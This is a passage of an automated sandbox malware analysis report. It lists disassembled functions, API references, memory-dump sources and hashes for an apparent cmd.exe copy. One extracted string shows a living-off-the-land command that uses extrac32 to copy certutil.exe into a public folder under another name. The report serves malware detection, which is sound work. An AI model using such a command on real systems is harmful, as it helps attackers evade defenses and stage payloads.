                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2149833895-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 031b29f9c3a5ab169ab6a7436925cea4718c6acc008cdbb9a328edb39569137a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42118C226087C28AE7609B10FD503AFEBA0FB84B98F844131DA9D42A55DBBCD449CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB8510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00007FF706EB85D4
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3520273530-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 984b5ecb76e88b939fe26c64f13788d0fd511dcda6992ebcd5435beb58f72e22
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7361C132A0930286F768BE24DD3537BA6A4FF04764F809236DA5E572D5DF3CA8818325
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 34b1bb124f580f6a2f4965e39ae764ca435d6702b084d8a239671bf65a1645cd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F0A0B7704B81CBC7008F64E98449DBB78FB04B88795853ACB2C03304DB71D9A4CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC93B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC93BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9b5b175545bb87afac3793dacbe18e48e6580ff2207791b9ba77dd1a18e841ec
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAB01214F25502D1D604BB72DCA507252A07F5C720FC00432C00E81260DF1C91DFC710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF706EBF52A,00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF8FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF96B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBFB14
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBF996
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD41B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD480
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3964947564-518410914
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 437f8b7fcf736409396ac7cc20901e166c58cf944e079e5a2b19de2cf122d3e7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE027A35A09B42C6EA18BB21AC701BBF6A5FF54B65FD49235D91E432E4DF3DA402C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: de233a751ee1008c7f59563add453aafe98392220083cd2450bae6600bc6abaf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D12525E08B43C6FA10BF21AC752BBA7A1BF54B54FD49035DA4E862A5DF3CA4068770
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 198002717-267741548
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f8af35ef404c2d139b67ec4be4383eeadfc9a528010c1075e7f29e6720ce1bdd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84511B29E08B43C6FA10AB15AC2067BEBA0FF49B95FC4A075C90E43694DF2DE5468760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e013f4d0c287cbe3ebfa2f1e287e0593fa020df7ca7306767efc87d432fedd09
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2229AA5E0875382FA647B15AD7427BE6A0BF14790FC4A236D99D432E4DF3CE4468730
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: "$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3545743878-4143597401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
